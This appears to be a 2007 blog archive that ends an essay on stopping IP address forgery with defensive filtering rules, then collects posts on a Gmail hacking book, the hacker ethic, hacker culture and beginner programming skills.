# Rule 5 for a backbone
# prevent packets that should stay in our backbone from going out
interface-0 allow out from UK-1 # UK traffic
interface-0 allow out from UK-2 # UK traffic
...
interface-0 allow out from UK-n # UK traffic
interface-0 prevent out from 0.0.0.0 # no other outbound traffic

In this example, we have assumed that all UK traffic is on IP
addresses identified as UK-1, ..., UKn.

What-ifs and Objections

WHAT IFS?
* What if a private network ignores the rules? It is to be expected
than many private networks will ignore any such rules, either
through ignorance, intent, or inattention. But even if all private
networks ignored all of the rules, the rules for ISPs would
prevent IP forgery from extending to the overall infrastructure.
* What if an ISP ignores the rules? If an ISP ignores the rules and
allows IP forgery, the backbone can protect the rest of the
Internet, at least to the point where forged packets within the
ISP's domain remain within or are traceable to that domain. That
means that the ISP's clients would be subject to IP forgeries from
other clients of that ISP, but that the rest of the Internet would
be able to trace all packets coming from that ISP to that ISP.
* What if the backbone ignores the rules? If all of the backbone
providers ignore the rules, unless everyone else follows them, we
will continue to have IP forgeries through the ISPs that don't
follow the rules.
* What if combinations ignore the rules? Depending on the specific
combinations, we will have more or fewer IP address forgeries. It
turns out that a complete analysis of this issue is not simple
enough to do in the space provided, but a simple conclusion can be
drawn without a full analysis. As more Internet users and
providers prevent IP address forgery, the job of the forger will
become harder and harder. We don't all have to participate in
order to have proper protection, but if we all fail to
participate, the forgeries will continue.

OTHER OBJECTIONS
* Content (common carrier) objections: Many ISPs and backbone
providers don't want or take responsibility for content in the
Internet. Just like a telephone company, they don't want any role
in examining or dictating the content of the messages - they only
want to be a delivery service. It could be argued that examining
the address information in an IP packet and preventing packets
based on those addresses constitutes limitation of content. Of
course the portion of the content involved here must be examined
in order to route the information, and the routing used in the
Internet already provides exclusion of packets based on IP address
ranges. Furthermore, common carriers (in the U.S.) are allowed to
listen to and filter traffic to the extent that this activity is
done solely to assure the proper operation of the network. Thus
this objection would seem to be moot.
* The cost is too high objection: In fact the cost is negligible. If
the rules set forth herein were applied as a normal part of the
installation and maintenance process, it would come to only a few
minutes of effort during each installation. Even applying them to
systems already in place requires only a few minutes of effort,
again an insubstantial amount of effort well within the discretion
of any systems administrator.
* The we don't want restrictions objections: There are a substantial
number of people that want a total lack of restrictions on
information flowing through the Internet. I generally agree with
the principle of free information flow, except in cases where the
freedom of one person infringes on the freedom of others. This
impingement on other peoples' rights applies to certain types of
information, such as routing information, that must be correct in
order for the Internet to work properly. Since the restrictions
described here only assure that the Internet works properly and
don't restrict the content or flow of information, there is no
restriction of the free flow of information here. Only increased
assurance that those who want to use the media for legitimate
purposes will continue to be able to do so.

Summary

This solution we presented:
* 1) is easy to implement,
* 2) makes good sense from a traffic standpoint,
* 3) allows all legitimate activity without any hinderence,
* 4) works even if all parties don't participate,
* 5) costs almost nothing to implement at each site,
* 6) does not require any changes in existing protocols of traffic
patterns,
* 7) makes good sense for the security of each party that
participates, and
* 8) can be done today.

All that remains is for the people in each of these organizations to
implement these protections. Unlike so many of the problems in the
Internet that are hard to solve and will require years of evolution,
this problem can be solved now. We encourage you to implement these
protections at your earliest convenience and to urge other to do so as
well. Together, we can eliminate IP address forgery.

Hacking GMail

2007-05-02T04:26:00.000-07:00

Hacking GMail

Book Description
The first book to unlock the true power behind Gmail, Hacking Gmail will immediately appeal to Google and Gmail fans
This is serious, down-and-dirty, under-the-hood, code-level hacking that will have readers eliminating the default settings, customizing appearance, disabling advertising, and taking control over their Gmail accounts
Covers turning Gmail into an online hard drive for backing up files, using it as a blogging tool, and even creating customized Gmail tools and hacks
Shows readers how to check their Gmail without visiting the site; use Gmail APIs in Perl, Python, PHP, and other languages, or create their own; and maximize Gmail as a host for message boards, photo galleries, even a blog

Download Now
Click Here to download

Hacker ethic

2007-04-04T06:55:00.000-07:00

Hacker ethic
From Wikipedia, the free encyclopedia
In modern parlance, the hacker ethic (otherwise known as hacktivism) is either:

the belief that information-sharing is a powerful positive good, and that it is an ethical duty of hackers to share their expertise by writing free software and facilitating access to information and computing resources wherever possible; and/or

the belief that system cracking for fun and exploration is ethically acceptable as long as the hacker commits no theft, vandalism, or breach of confidentiality. Some distinguish hacking (writing good software and sharing it for free), from cracking (breaking the law).

Both of these normative ethical principles are widely, but by no means universally, accepted among hackers. The first, and arguably the second, emerged from the MIT Artificial Intelligence Laboratory during the '60s and '70s.

Most hackers subscribe to the hacker ethic in the first sense, and many act on it by writing free software, giving the user permission to study, modify, and redistribute it. A few, such as the Free Software Foundation, go further and assert that it is immoral to prevent computer users from sharing or altering software, as is typical with proprietary software.

The second sense is more controversial: some people consider the act of cracking afoul of the government itself to be unethical, like breaking and entering into an office. But the belief that 'ethical' cracking excludes destruction at least moderates the behavior of people who see themselves as 'benign' crackers (see also samurai, grey hat). On this view, it may be one of the highest forms of hacker courtesy to (a) break into a system, and then (b) explain to the SysOp, preferably by email from a superuser account, exactly how it was done and how the hole can be plugged; effectively acting as an unpaid (and unsolicited) tiger team.

The most reliable manifestation of either version of the hacker ethic is that almost all hackers are actively willing to share technical tricks, software, and (where possible) computing resources with other hackers. Huge cooperative networks such as Usenet, FidoNet and the Internet itself can function without central control because of this trait; they both rely on and reinforce a sense of community that may be hackerdom's most valuable intangible asset.

History

The term "hacker ethic" was coined by journalist Steven Levy and used for the first time in Hackers: Heroes of the Computer Revolution (1984). Levy's account of the hacker ethic is in large parts based on the values of the "old school" hackers at MIT Artificial Intelligence Laboratory. Among these hackers were Richard M. Stallman, whom Levy at the time called the last true hacker. The similarities between the Hacker Ethic and values existing in open scientific communities is, therefore, no coincidence.

In Levy's codification, the principles of the Hacker Ethic were:

Access to computers — and anything which might teach you something about the way the world works — should be unlimited and total. Always yield to the Hands-on Imperative!

All information should be free.

Mistrust authority — promote decentralization.

Hackers should be judged by their hacking, not bogus criteria such as degrees, age, race, or position.

You can create art and beauty on a computer.

Computers can change your life for the better.

Later in 2001, Finnish philosopher Pekka Himanen opposed the Hacker ethic with Protestant work ethic. In Himanen's opinion the hacker ethic is more closely related to the Virtue ethics found in the writings of Plato and of Aristotle.

For Himanen (who wrote "The Hacker Ethic"), Torvalds (prologue), and Castells (epilogue), the hacker ethic centers around passion, hard work, creativity and joy in creating software.

Written on January 8th, 1986 by a hacker with the handle "The Mentor", 'The Hacker Manifesto' illustrates some of the commonly held philosophies of hacker ethic. Hacker ethic itself is typically a discussion arising in reference to the definition of a hacker as an individual capable and willing to infiltrate, exploit, or otherwise bypass security restrictions for some purpose. It is the intentions of the hacker, and their purpose which are deemed either ethical, or unethical based on the so called hacker ethic. Note, hackers themselves tend to have little patience for incompetence, hence, were one to damage a system in an attempt to infiltrate it, even with good intentions, it may be considered somewhat unethical in that an individual without the necessary skill to accomplish the task at hand, would be deemed unfit to take on the responsibility. The Hacker Manifesto was written to give somewhat of an insight into the motivations of a hacker, which is closely related to the so called hacker ethic. Essentially it served as an argument that, though a hacker may break the law, their intentions may still be entirely good natured, purposeful, beneficial, and otherwise ethical.

Points For Style Hackers

2007-03-04T13:28:00.000-08:00

Again, to be a hacker, you have to enter the hacker mindset. There are some things you can do when you're not at a computer that seem to help. They're not substitutes for hacking (nothing is) but many hackers do them, and feel that they connect in some basic way with the essence of hacking.

Learn to write your native language well. Though it's a common stereotype that programmers can't write, a surprising number of hackers (including all the most accomplished ones I know of) are very able writers.

Read science fiction. Go to science fiction conventions (a good way to meet hackers and proto-hackers).

Train in a martial-arts form. The kind of mental discipline required for martial arts seems to be similar in important ways to what hackers do. The most popular forms among hackers are definitely Asian empty-hand arts such as Tae Kwon Do, various forms of Karate, Kung Fu, Aikido, or Ju Jitsu. Western fencing and Asian sword arts also have visible followings. In places where it's legal, pistol shooting has been rising in popularity since the late 1990s. The most hackerly martial arts are those which emphasize mental discipline, relaxed awareness, and control, rather than raw strength, athleticism, or physical toughness.

Study an actual meditation discipline. The perennial favorite among hackers is Zen (importantly, it is possible to benefit from Zen without acquiring a religion or discarding one you already have). Other styles may work as well, but be careful to choose one that doesn't require you to believe crazy things.

Develop an analytical ear for music. Learn to appreciate peculiar kinds of music. Learn to play some musical instrument well, or how to sing.

Develop your appreciation of puns and wordplay.

The more of these things you already do, the more likely it is that you are natural hacker material. Why these things in particular is not completely clear, but they're connected with a mix of left- and right-brain skills that seems to be important; hackers need to be able to both reason logically and step outside the apparent logic of a problem at a moment's notice.

Work as intensely as you play and play as intensely as you work. For true hackers, the boundaries between "play", "work", "science" and "art" all tend to disappear, or to merge into a high-level creative playfulness. Also, don't be content with a narrow range of skills. Though most hackers self-describe as programmers, they are very likely to be more than competent in several related skills — system administration, web design, and PC hardware troubleshooting are common ones. A hacker who's a system administrator, on the other hand, is likely to be quite skilled at script programming and web design. Hackers don't do things by halves; if they invest in a skill at all, they tend to get very good at it.

Finally, a few things not to do.

Don't use a silly, grandiose user ID or screen name.

Don't get in flame wars on Usenet (or anywhere else).

Don't call yourself a ‘cyberpunk’, and don't waste your time on anybody who does.

Don't post or email writing that's full of spelling errors and bad grammar.

Don't use a silly, grandiose user ID or screen name. Don't get in flame wars on Usenet (or anywhere else).

The only reputation you'll make doing any of these things is as a twit. Hackers have long memories — it could take you years to live your early blunders down enough to be accepted.

The problem with screen names or handles deserves some amplification. Concealing your identity behind a handle is a juvenile and silly behavior characteristic of crackers, warez d00dz, and other lower life forms. Hackers don't do this; they're proud of what they do and want it associated with their real names. So if you have a handle, drop it. In the hacker culture it will only mark you as a loser.

The Hacker/Nerd Connection

2007-03-04T13:26:00.000-08:00

Contrary to popular myth, you don't have to be a nerd to be a hacker. It does help, however, and many hackers are in fact nerds. Being something a social outcast helps you stay concentrated on the really important things, like thinking and hacking.

For this reason, many hackers have adopted the label ‘geek’ as a badge of pride — it's a way of declaring their independence from normal social expectations (as well as a fondness for other things like science fiction and strategy games that often go with being a hacker). The term 'nerd' used to be used this way back in the 1990s, back when 'nerd' was a mild pejorative and 'geek' a rather harsher one; sometime after 2000 they switched places, at least in U.S. popular culture, and there is now even a significant geek-pride culture among people who aren't techies.

If you can manage to concentrate enough on hacking to be good at it and still have a life, that's fine. This is a lot easier today than it was when I was a newbie in the 1970s; mainstream culture is much friendlier to techno-nerds now. There are even growing numbers of people who realize that hackers are often high-quality lover and spouse material.

If you're attracted to hacking because you don't have a life, that's OK too — at least you won't have trouble concentrating. Maybe you'll get a life later on.

Status in the Hacker Culture

2007-03-04T12:38:00.000-08:00

Like most cultures without a money economy, hackerdom runs on reputation. You're trying to solve interesting problems, but how interesting they are, and whether your solutions are really good, is something that only your technical peers or superiors are normally equipped to judge.

Accordingly, when you play the hacker game, you learn to keep score primarily by what other hackers think of your skill (this is why you aren't really a hacker until other hackers consistently call you one). This fact is obscured by the image of hacking as solitary work; also by a hacker-cultural taboo (gradually decaying since the late 1990s but still potent) against admitting that ego or external validation are involved in one's motivation at all.

Specifically, hackerdom is what anthropologists call a gift culture. You gain status and reputation in it not by dominating other people, nor by being beautiful, nor by having things other people want, but rather by giving things away. Specifically, by giving away your time, your creativity, and the results of your skill.

There are basically five kinds of things you can do to be respected by hackers:

1. Write open-source software

The first (the most central and most traditional) is to write programs that other hackers think are fun or useful, and give the program sources away to the whole hacker culture to use.

(We used to call these works “free software”, but this confused too many people who weren't sure exactly what “free” was supposed to mean. Most of us now prefer the term “open-source” software).

Hackerdom's most revered demigods are people who have written large, capable programs that met a widespread need and given them away, so that now everyone uses them.

But there's a bit of a fine historical point here. While hackers have always looked up to the open-source developers among them as our community's hardest core, before the mid-1990s most hackers most of the time worked on closed source. This was still true when I wrote the first version of this HOWTO in 1996; it took the mainstreaming of open-source software after 1997 to change things. Today, "the hacker community" and "open-source developers" are two descriptions for what is essentially the same culture and population — but it is worth remembering that this was not always so.

2. Help test and debug open-source software

They also serve who stand and debug open-source software. In this imperfect world, we will inevitably spend most of our software development time in the debugging phase. That's why any open-source author who's thinking will tell you that good beta-testers (who know how to describe symptoms clearly, localize problems well, can tolerate bugs in a quickie release, and are willing to apply a few simple diagnostic routines) are worth their weight in rubies. Even one of these can make the difference between a debugging phase that's a protracted, exhausting nightmare and one that's merely a salutary nuisance.

If you're a newbie, try to find a program under development that you're interested in and be a good beta-tester. There's a natural progression from helping test programs to helping debug them to helping modify them. You'll learn a lot this way, and generate good karma with people who will help you later on.

3. Publish useful information

Another good thing is to collect and filter useful and interesting information into web pages or documents like Frequently Asked Questions (FAQ) lists, and make those generally available.

Maintainers of major technical FAQs get almost as much respect as open-source authors.
4. Help keep the infrastructure working

The hacker culture (and the engineering development of the Internet, for that matter) is run by volunteers. There's a lot of necessary but unglamorous work that needs done to keep it going — administering mailing lists, moderating newsgroups, maintaining large software archive sites, developing RFCs and other technical standards.

People who do this sort of thing well get a lot of respect, because everybody knows these jobs are huge time sinks and not as much fun as playing with code. Doing them shows dedication.

5. Serve the hacker culture itself

Finally, you can serve and propagate the culture itself (by, for example, writing an accurate primer on how to become a hacker :-)). This is not something you'll be positioned to do until you've been around for while and become well-known for one of the first four things.

The hacker culture doesn't have leaders, exactly, but it does have culture heroes and tribal elders and historians and spokespeople. When you've been in the trenches long enough, you may grow into one of these. Beware: hackers distrust blatant ego in their tribal elders, so visibly reaching for this kind of fame is dangerous. Rather than striving for it, you have to sort of position yourself so it drops in your lap, and then be modest and gracious about your status.

Basic Hacking Skills

2007-03-04T12:04:00.000-08:00

The hacker attitude is vital, but skills are even more vital. Attitude is no substitute for competence, and there's a certain basic toolkit of skills which you have to have before any hacker will dream of calling you one.

This toolkit changes slowly over time as technology creates new skills and makes old ones obsolete. For example, it used to include programming in machine language, and didn't until recently involve HTML. But right now it pretty clearly includes the following:

1. Learn how to program.

This, of course, is the fundamental hacking skill. If you don't know any computer languages, I recommend starting with Python. It is cleanly designed, well documented, and relatively kind to beginners. Despite being a good first language, it is not just a toy; it is very powerful and flexible and well suited for large projects. I have written a more detailed evaluation of Python. Good tutorials are available at the Python web site.

Java is also a good language for learning to program in. It is more difficult than Python, but produces faster code than Python. I think it makes an excellent second language. Unfortunately, Sun's reference implementation is still proprietary. This is not so much an issue with the Java language itself, as high-quality open-source Java interpreters are readily available; the real problem is the class libraries that travel with the language. The open-source class libraries lag behind Sun's. So, if you do choose to learn Java, do it with one of the open-source implementations rather than becoming dependent on Sun's proprietary code.

But be aware that you won't reach the skill level of a hacker or even merely a programmer if you only know one or two languages — you need to learn how to think about programming problems in a general way, independent of any one language. To be a real hacker, you need to get to the point where you can learn a new language in days by relating what's in the manual to what you already know. This means you should learn several very different languages.

If you get into serious programming, you will have to learn C, the core language of Unix. C++ is very closely related to C; if you know one, learning the other will not be difficult. Neither language is a good one to try learning as your first, however. And, actually, the more you can avoid programming in C the more productive you will be.

C is very efficient, and very sparing of your machine's resources. Unfortunately, C gets that efficiency by requiring you to do a lot of low-level management of resources (like memory) by hand. All that low-level code is complex and bug-prone, and will soak up huge amounts of your time on debugging. With today's machines as powerful as they are, this is usually a bad tradeoff — it's smarter to use a language that uses the machine's time less efficiently, but your time much more efficiently. Thus, Python.

Other languages of particular importance to hackers include Perl and LISP. Perl is worth learning for practical reasons; it's very widely used for active web pages and system administration, so that even if you never write Perl you should learn to read it. Many people use Perl in the way I suggest you should use Python, to avoid C programming on jobs that don't require C's machine efficiency. You will need to be able to understand their code.

LISP is worth learning for a different reason — the profound enlightenment experience you will have when you finally get it. That experience will make you a better programmer for the rest of your days, even if you never actually use LISP itself a lot. (You can get some beginning experience with LISP fairly easily by writing and modifying editing modes for the Emacs text editor, or Script-Fu plugins for the GIMP.)

It's best, actually, to learn all five of Python, C/C++, Java, Perl, and LISP. Besides being the most important hacking languages, they represent very different approaches to programming, and each will educate you in valuable ways.

I can't give complete instructions on how to learn to program here — it's a complex skill. But I can tell you that books and courses won't do it (many, maybe most of the best hackers are self-taught). You can learn language features — bits of knowledge — from books, but the mind-set that makes that knowledge into living skill can be learned only by practice and apprenticeship. What will do it is (a) reading code and (b) writing code.

Peter Norvig, who is one of Google's top hackers and the co-author of the most widely used textbook on AI, has written an excellent essay called Teach Yourself Programming in Ten Years. His "recipe for programming success" is worth careful attention.

Learning to program is like learning to write good natural language. The best way to do it is to read some stuff written by masters of the form, write some things yourself, read a lot more, write a little more, read a lot more, write some more ... and repeat until your writing begins to develop the kind of strength and economy you see in your models.

Finding good code to read used to be hard, because there were few large programs available in source for fledgeling hackers to read and tinker with. This has changed dramatically; open-source software, programming tools, and operating systems (all built by hackers) are now widely available. Which brings me neatly to our next topic...

2. Get one of the open-source Unixes and learn to use and run it.

I'll assume you have a personal computer or can get access to one. (Take a moment to appreciate how much that means. The hacker culture originally evolved back when computers were so expensive that individuals could not own them.) The single most important step any newbie can take toward acquiring hacker skills is to get a copy of Linux or one of the BSD-Unixes or OpenSolaris, install it on a personal machine, and run it.

Yes, there are other operating systems in the world besides Unix. But they're distributed in binary — you can't read the code, and you can't modify it. Trying to learn to hack on a Microsoft Windows machine or under any other closed-source system is like trying to learn to dance while wearing a body cast.

Under Mac OS X it's possible, but only part of the system is open source — you're likely to hit a lot of walls, and you have to be careful not to develop the bad habit of depending on Apple's proprietary code. If you concentrate on the Unix under the hood you can learn some useful things.

Unix is the operating system of the Internet. While you can learn to use the Internet without knowing Unix, you can't be an Internet hacker without understanding Unix. For this reason, the hacker culture today is pretty strongly Unix-centered. (This wasn't always true, and some old-time hackers still aren't happy about it, but the symbiosis between Unix and the Internet has become strong enough that even Microsoft's muscle doesn't seem able to seriously dent it.)

So, bring up a Unix — I like Linux myself but there are other ways (and yes, you can run both Linux and Microsoft Windows on the same machine). Learn it. Run it. Tinker with it. Talk to the Internet with it. Read the code. Modify the code. You'll get better programming tools (including C, LISP, Python, and Perl) than any Microsoft operating system can dream of hosting, you'll have fun, and you'll soak up more knowledge than you realize you're learning until you look back on it as a master hacker.

For more about learning Unix, see The Loginataka. You might also want to have a look at The Art Of Unix Programming.

To get your hands on a Linux, see the Linux Online! site; you can download from there or (better idea) find a local Linux user group to help you with installation. From a new user's point of view, all Linux distributions are pretty much equivalent.

You can find BSD Unix help and resources at www.bsd.org.

I have written a primer on the basics of Unix and the Internet.

(Note: I don't really recommend installing either Linux or BSD as a solo project if you're a newbie. For Linux, find a local Linux user's group and ask for help.)

3. Learn how to use the World Wide Web and write HTML.

Most of the things the hacker culture has built do their work out of sight, helping run factories and offices and universities without any obvious impact on how non-hackers live. The Web is the one big exception, the huge shiny hacker toy that even politicians admit has changed the world. For this reason alone (and a lot of other good ones as well) you need to learn how to work the Web.

This doesn't just mean learning how to drive a browser (anyone can do that), but learning how to write HTML, the Web's markup language. If you don't know how to program, writing HTML will teach you some mental habits that will help you learn. So build a home page. Try to stick to XHTML, which is a cleaner language than classic HTML. (There are good beginner tutorials on the Web; here's one.)

But just having a home page isn't anywhere near good enough to make you a hacker. The Web is full of home pages. Most of them are pointless, zero-content sludge — very snazzy-looking sludge, mind you, but sludge all the same (for more on this see The HTML Hell Page).

To be worthwhile, your page must have content — it must be interesting and/or useful to other hackers. And that brings us to the next topic...

4. If you don't have functional English, learn it.

As an American and native English-speaker myself, I have previously been reluctant to suggest this, lest it be taken as a sort of cultural imperialism. But several native speakers of other languages have urged me to point out that English is the working language of the hacker culture and the Internet, and that you will need to know it to function in the hacker community.

Back around 1991 I learned that many hackers who have English as a second language use it in technical discussions even when they share a birth tongue; it was reported to me at the time that English has a richer technical vocabulary than any other language and is therefore simply a better tool for the job. For similar reasons, translations of technical books written in English are often unsatisfactory (when they get done at all).

Linus Torvalds, a Finn, comments his code in English (it apparently never occurred to him to do otherwise). His fluency in English has been an important factor in his ability to recruit a worldwide community of developers for Linux. It's an example worth following.

Being a native English-speaker does not guarantee that you have language skills good enough to function as a hacker. If your writing is semi-literate, ungrammatical, and riddled with misspellings, many hackers (including myself) will tend to ignore you. While sloppy writing does not invariably mean sloppy thinking, we've generally found the correlation to be strong — and we have no use for sloppy thinkers. If you can't yet write competently, learn to.

Who Is Hacker

2007-03-01T12:49:00.000-08:00

From Wikipedia, the free encyclopedia

A hacker is often someone who creates and modifies computer software or computer hardware, including computer programming, administration, and security-related items. A hacker is also someone who modifies electronics, for example, ham radio transceivers, printers or even home sprinkler systems to get extra functionality or performance. The term usually bears strong connotations, but may be either favorable or denigrating depending on cultural context (see the hacker definition controversy).

In computer programming, a hacker is a software designer and programmer who builds elegant, beautiful programs and systems. A hacker can also be a programmer who hacks or reaches a goal by employing a series of modifications to exploit or extend existing code or resources. For some, "hacker" has a negative connotation and refers to a person who "hacks" or uses kludges to accomplish programming tasks that are ugly, inelegant, and inefficient. This pejorative form of the noun "hack" is even used incorrectly among users of the positive sense of "hacker".

In computer security, a hacker is a person who specializes in work with the security mechanisms for computer and network systems. While including those who endeavor to strengthen such mechanisms, it is more often used by the mass media and popular culture to refer to those who seek access despite them.

In other technical fields, hacker is extended to mean a person who makes things work beyond perceived limits through their own technical skill, such as a hardware hacker, or reality hacker.

In hacker culture, a hacker is a person who has attained a certain social status and is recognized among members of the culture for commitment to the culture's values and a certain amount of technical knowledge.

Categories of hacker

The hacker community, the set of people who would describe themselves as hackers or described by others as hackers, falls into at least three partially overlapping categories. Sometimes alternate terms such as "cracker" are used in an attempt to more exactly distinguish which category of hacker is intended, or when attempting to put a contextual distance between the categories due to the hacker definition controversy.

Hacker: Highly skilled programmer

This mainly positive usage of hacker refers to one who knows a (sometimes specified) set of programming interfaces well enough to program rapidly and expertly. This type of hacker is well-respected (although the term still carries some of the meaning of hack), and is capable of developing programs without adequate planning or where pre-planning is difficult or impossible to achieve. This situation gives freedom and the ability to be creative against a methodical and careful progress. At their best, hackers can be very productive. The technical downside of hacker productivity is often in maintainability, documentation, and completion. Very talented hackers may become bored with a project once they have figured out all of the hard parts, and be unwilling to finish off the "details". This attitude can cause friction in environments where other programmers are expected to pick up the half finished work, decipher the structures and ideas, and bullet-proof the code. In other cases, where a hacker is willing to maintain their own code, a company may be unable to find anyone else who is capable or willing to dig through code to maintain the program if the original programmer moves on to a new job.

Additionally, there is sometimes a social downside associated with hacking. The stereotype of a hacker as having gained technical ability at a cost in social ability has been observed by many individuals, including noted psychologist Phillip Zimbardo[1]. Some researches have speculated on a possible link between hacking and conditions in the Autism spectrum, such as Asperger's Syndrome[2]; for example, Bram Cohen, the hacker who created the Bittorrent protocol, is believed by many (including himself) to have Asperger's[3]. While such social stunting from whatever cause is not universal among hackers, nor even only restricted to hackers, the difficulty in relating to others and the often abrasive personalities of some hackers makes some of them difficult to work with or to organize into teams.[4] On the other hand, it is not uncommon for hackers to thrive on social interaction.

Hacker: Computer and network security expert
Main article: Hacker (computer security)

In the networking sense, a hacker is one who specializes in work with the access control mechanisms for computer and network systems. This includes individuals who work toward maintaining and improving the integrity of such mechanisms. However, the most common usage of hacker in this respect refers to someone who exploits systems or gains unauthorized access by means of clever tactics and detailed knowledge, while taking advantage of any carelessness or ignorance on the part of system operators. This use of hacker as intruder (frequent in the media) generally has a strong negative connotation, and is disparaged and discouraged within the computer community, resulting in the modern Hacker definition controversy.

For such hackers specializing in intrusion, the highly derogatory term script kiddies is often used to indicate those who either claim to have far more skill than they actually have, or who exclusively use programs developed by others to achieve a successful security exploit.

Hacker: Hardware modifier
Main article: Hardware hacker
A modified computer, featuring water cooling and ultraviolet lighting

Another type of hacker is one who creates novel hardware modifications. At the most basic end of this spectrum are those who make frequent changes to the hardware in their computers using standard components, or make semi-cosmetic themed modifications to the appearance of the machine. This type of Hacker modifies his/her computer for performance needs and/or aesthetics. These changes often include adding memory, storage or LEDs and cold cathode tubes for light effects. These people often show off their talents in contests, and many enjoy LAN parties. At the more advanced end of the hardware hackers are those who modify hardware (not limited to computers) to expand capabilities; this group blurs into the culture of hobbyist inventors and professional electronics engineering. An example of such modification includes the addition of TCP/IP Internet capabilities to a number of vending machines and coffee makers during the late 1980s and early 1990s.

Hackers who have the ability to write circuit-level code, device drivers, firmware, low-level networking, (and even more impressively, using these techniques to make devices do things outside of their spec sheets), are typically in very high regard among hacker communities. This is primarily due to the enormous difficulty, complexity and specialized domain knowledge required for this type of work, as well as the electrical engineering expertise that plays a large role. Such hackers are rare, and almost always considered to be wizards or gurus of a very high degree.